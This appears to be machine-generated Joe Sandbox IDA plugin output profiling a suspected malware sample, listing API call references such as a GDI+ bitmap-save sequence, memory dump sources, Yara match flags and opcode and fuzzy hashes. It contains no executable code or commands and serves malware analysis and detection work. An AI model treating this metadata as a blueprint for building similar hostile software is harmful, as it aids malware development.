                                                                                                                                                                                                                              • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                                                                                                                                                                              • int.LIBCPMT ref: 004054F0
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2243866535-0
                                                                                                                                                                                                                              • Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                              • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                                                                                                                                                                              • int.LIBCPMT ref: 0040558C
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2243866535-0
                                                                                                                                                                                                                              • Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                              • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0078C3F7
                                                                                                                                                                                                                              • int.LIBCPMT ref: 0078C40E
                                                                                                                                                                                                                                • Part of subcall function 0078BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0078BFCA
                                                                                                                                                                                                                                • Part of subcall function 0078BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0078BFE4
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0078C417
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0078C448
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0078C45E
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0078C47C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2243866535-0
                                                                                                                                                                                                                              • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                              • Instruction ID: 4bd149ad2687ee84fd47be105b3f6cafa68459d12ba0b29ec7b8bf5520fa8cea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B111CE71980218DBCB12FBA4D85AAFD7B70AF40710F204519F915AB292DB3C9A45CBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00404E60
                                                                                                                                                                                                                                • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00404EBA
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                              • String ID: \J@
                                                                                                                                                                                                                              • API String ID: 1836011271-3870157017
                                                                                                                                                                                                                              • Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                                                                                                                                              • Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                                                                                                                                              • Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0078C8D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$r5x
                                                                                                                                                                                                                              • API String ID: 2005118841-895697221
                                                                                                                                                                                                                              • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                              • Instruction ID: d975d5bb209b40c841ad8b3d84b18f03888850aee9eca741d095b53f625ce911
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5F0F6739C06086BCB45F954CC06BAA33985B11711F148066EE416B083FB7C9D05C7B5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: pScheduler
                                                                                                                                                                                                                              • API String ID: 3657713681-923244539
                                                                                                                                                                                                                              • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                              • Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                              • String ID: MOC$RCC$f)D
                                                                                                                                                                                                                              • API String ID: 3472968176-2775210027
                                                                                                                                                                                                                              • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                              • Instruction ID: 94383aa8af0b257e7430c0497562b6668391c754ddb28df8e03f85348aa4709c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40F0F970504215DFDB12AF69C449B6D3B64AF47B00F49829DF4445B2A2CB7CAE44DFE2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                                                                                                                                              • Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                              • Instruction ID: d045e6e64e70b81a30317b98ace7541e95155049cb85ed5e455432246055a778
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA71A071D002569BCB218FA5C884ABFBB75EFD7360F684329E411A7283D7789D51CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00430B3F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00430B56
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00430B75
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00430B90
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00430BA7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3033488037-0
                                                                                                                                                                                                                              • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                              • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3033488037-0
                                                                                                                                                                                                                              • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                              • Instruction ID: f44f3888efb73f8c2a61b7ba81a3995f3695b9b1890aab13b010ea9a334bb8bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9451A171A00304EFDB20EF69D841BABB7F4EF58724B144669E809D7291E739EE51CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                              • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                              • Instruction ID: dd9cbe36967f4d2c4d8dd36ec420e0118537281080c711a03bb85d87e0134789
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3841D132A003049FCB14DF78C894B9DB7A5EF85714B9545A9E915EB381DB39AD01CB80
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00436912
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0043697E
                                                                                                                                                                                                                                • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 313313983-0
                                                                                                                                                                                                                              • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                              • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _SpinWait.LIBCONCRT ref: 0041AEDB
                                                                                                                                                                                                                                • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
                                                                                                                                                                                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
                                                                                                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
                                                                                                                                                                                                                              • List.LIBCMT ref: 0041AFA4
                                                                                                                                                                                                                              • List.LIBCMT ref: 0041AFB3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3281396844-0
                                                                                                                                                                                                                              • Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                                                                                                                                              • Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _SpinWait.LIBCONCRT ref: 0079B142
                                                                                                                                                                                                                                • Part of subcall function 00791178: _SpinWait.LIBCONCRT ref: 00791190
                                                                                                                                                                                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0079B156
                                                                                                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0079B188
                                                                                                                                                                                                                              • List.LIBCMT ref: 0079B20B
                                                                                                                                                                                                                              • List.LIBCMT ref: 0079B21A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3281396844-0
                                                                                                                                                                                                                              • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                              • Instruction ID: 34646b7cbb8fbd46e219c75f22ffa082f2744046389e05f8ae4065155a08a259
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D316732D4165ADFCF14EFA8FAA56EDB7B1BF44308F04006AD8016B652DB396E14CB90
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                                                                                                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                                                                                                                                                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                                                                                                                                                                              • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                                                                                                                                                                              • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2357751836-0
                                                                                                                                                                                                                              • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                              • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00785099
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 007850AD
                                                                                                                                                                                                                                • Part of subcall function 0078BDA4: __EH_prolog3_GS.LIBCMT ref: 0078BDAB
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00785112
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 00785121
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00785131
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
